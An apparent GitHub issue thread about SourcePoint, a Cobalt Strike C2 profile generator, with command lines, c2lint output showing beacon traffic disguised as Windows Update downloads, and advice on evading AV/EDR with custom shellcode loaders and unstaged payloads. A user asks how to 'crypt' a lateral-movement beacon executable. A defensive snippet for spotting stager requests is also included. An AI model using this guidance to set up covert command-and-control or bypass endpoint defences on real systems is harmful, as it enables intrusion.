sec13b closed 7 months ago
Include all defaults?
```
./SourcePoint -Injector NtMapViewOfSection -Jitter 20 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 13 -Profile 1 -Stage True -Sleep 0 -Syscall Direct -Useragent Win10Chrome -Outfile myprofile.profile -Host {SECRET.IP}
```

```
[*] Starting c2lint

GET /c/msdownload/update/others/2021/10/P9WLwVNmTXfe7sI7N2bX4Zu6QJAzrQTvPKb39JFx0_Q.cab HTTP/1.1
Accept: */*
Host: 168.235.72.134
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36

HTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Server: Microsoft-IIS/8.5
MSRegion: N. America
Connection: keep-alive
X-Powered-By: ASP.NET
Content-Length: 131

uv....C...G..2..z$......q.....,..*....dV../.ku..Q-...>....L....J(.data_jitter:up.to.50.bytes.of.random.data...)

GET /c/msdownload/update/others/2021/10/xynGXwrm5ysSl7aIffi3CfJtEdf_WyhvDGWzOs5Q.cab HTTP/1.1
Accept: */*
Host: download.windowsupdate.com/c/42905
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36

HTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed
Server: Microsoft-IIS/8.5
MSRegion: N. America
Connection: keep-alive
X-Powered-By: ASP.NET
Content-Length: 67

(.data_jitter:up.to.50.bytes.of.random.data...)

GET /WT9x HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4562.0 Safari/537.36

HTTP/1.1 200 OK
Content-Type: application/vnd.ms-cab-compressed

[+] POST 3x check passed
[+] .http-get.server.output size is good
[+] .http-get.client size is good
[+] .http-post.client size is good
[+] .http-get.client.metadata transform+mangle+recover passed (1 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (100 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (128 byte[s])
[+] .http-get.client.metadata transform+mangle+recover passed (256 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (0 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (48248 byte[s])
[+] .http-get.server.output transform+mangle+recover passed (1048576 byte[s])
[+] .http-post.client.id transform+mangle+recover passed (4 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (0 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (1 byte[s])
[+] .http-post.client.output chunks results
[+] .http-post.client.output transform+mangle+recover passed (33 byte[s])
[+] .http-post.client.output transform+mangle+recover passed (128 byte[s])
[!] Profile uses HTTP Host header for C&C. Will ignore Host header specified in payload config.
[%] [OPSEC] .host_stage is true. Your Beacon payload is available to anyone that connects to your server to request it. Are you OK with this?
[!] .code-signer.keystore is missing. Will not sign executables and DLLs
[+] SSL certificate generation OK
[*] Checking beacon WININET dlls...
[*] Checking beacon WINHTTP dlls...
[!] Detected 2 warnings.
root@host5:/opt#
```
So I'll try to answer your questions to the best of my ability. First, I would never use the standard .exe or .dll. Cobalt Strike is a widely used C2 framework; as such, samples of those files have been uploaded to every AV/EDR company. It's recommended to always use the raw shellcode option with a custom loader. Custom loaders have a higher success rate of then launching the shellcode.
Second, to your comment about staged shellcode, I typically don't run with that option because staged shellcode is a huge IOC (because you can't customize the method of communication for the second stage, so everyone who runs staged is doing the same thing).
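A defender-side illustration of why staging is such a consistent indicator, added here as an example and not part of the original thread or of SourcePoint. It assumes the publicly documented stager convention (not stated on this page) that the stage is requested from a short random URI whose character sum modulo 256 is 92 (x86) or 93 (x64), which the `GET /WT9x` request in the c2lint output above satisfies. The function names and the access-log lines are constructed for the example.

```python
import re

# Assumption (public knowledge, not stated in this thread): default Cobalt Strike /
# Metasploit HTTP stagers fetch the stage from a short random URI whose byte sum
# modulo 256 is 92 (x86) or 93 (x64).
STAGER_SUMS = {92: "x86", 93: "x64"}

# Heuristic chosen for this example: only single-segment, 4-character alphanumeric
# paths are considered, to cut down the roughly 2-in-256 chance match on other URIs.
SHORT_URI_RE = re.compile(r"/[A-Za-z0-9]{4}")

# Minimal matcher for common/combined-format web access log lines.
REQUEST_RE = re.compile(r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')


def checksum8(uri: str) -> int:
    """Sum of the URI's characters, slashes removed, modulo 256."""
    return sum(uri.replace("/", "").encode("latin-1", "replace")) % 256


def classify_uri(uri: str):
    """Return 'x86'/'x64' if the URI looks like a stager request, else None."""
    path = uri.split("?", 1)[0]
    if not SHORT_URI_RE.fullmatch(path):
        return None
    return STAGER_SUMS.get(checksum8(path))


def scan(lines):
    """Return (source, uri, arch) for every GET that matches the stager pattern."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m or m["method"] != "GET":
            continue
        arch = classify_uri(m["uri"])
        if arch:
            hits.append((m["src"], m["uri"], arch))
    return hits


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Oct/2021:10:00:00 +0000] "GET /WT9x HTTP/1.1" 200 261',
    '203.0.113.7 - - [01/Oct/2021:10:00:05 +0000] "GET /c/msdownload/update/others/2021/10/example.cab HTTP/1.1" 200 131',
    '198.51.100.9 - - [01/Oct/2021:10:01:00 +0000] "GET /WT9y HTTP/1.1" 200 261',
    '198.51.100.9 - - [01/Oct/2021:10:02:00 +0000] "GET /blog HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for src, uri, arch in scan(SAMPLE_LOG):
        print(f"possible {arch} stager request from {src}: {uri}")
```

A match is a hunting lead rather than a verdict: legitimate four-character paths hit the same checksum about once in 128 requests, so correlate with the size and content type of the response.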
I understand perfectly. I just want to learn more.
But, for example: is there any option to have (`\\192.168.1.114\ADMIN$\74c35f5.exe`) crypted, to bypass AV/EDR in a pentest? Tasked beacon to run windows/beacon_bind_pipe (`\\.\pipe\msagent_e1`) on 192.168.1.114 via Service Control Manager (`\\192.168.1.114\ADMIN$\74c35f5.exe`) is killed instantly.
So that sounds like an issue with how Cobalt Strike is doing post-ex actions related to setting up a pipe (in the example above). This doesn't have much to do with SourcePoint; rather, it could be limitations/IOCs for how Cobalt Strike does certain actions (for example, setting up pipes). SourcePoint has three options for SMB. They are:

- SMB Frame Header - Adds a header value to the SMB beacon messages
- Pipename - Sets the name of the SMB pipe the beacon is going to use for communication
- Pipename Stager - Sets the name of the SMB stager for the beacons

If you want to learn more, I'd suggest playing around with these options and seeing if your results vary.
Thank you a lot. I will test.
I use these 2 commands:
```
./SourcePoint -Injector NtMapViewOfSection -Host {SECRET.IP} -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome
[*] Preparing Varibles...
[!] Self Signed SSL Cerificate Used
[*] Building Profile...
[!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
[*] Beacon DLL Spoofed To: srvcli.dll
[*] Post-Ex Process Name: mcbuilder.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile: WindowsUpdate
[+] Profile Generated: teststage2.profile
[+] Happy Hacking
```

```
./SourcePoint -Outfile out.profile -Host {SECRET.IP} -Injector NtMapViewOfSection
[*] Preparing Varibles...
[*] Building Profile...
[!] Host Staging Is Disabled - Staged Payloads Are Not Available But Your Beacon Payload Is Not Available To Anyone That Connects
[*] Beacon DLL Spoofed To: GPSVC.dll
[*] Post-Ex Process Name: pcaui.exe
[!] Beacon Shellcode Will Obfuscate Beacon in Memory Prior to Sleeping
[!] ThreadSpooffing in enabled
[!] No Syscall method selected
[*] Seleted Profile:
[+] Profile Generated: strannik2.profile
[+] Happy Hacking
```
Is this normal?
And the exe is detected.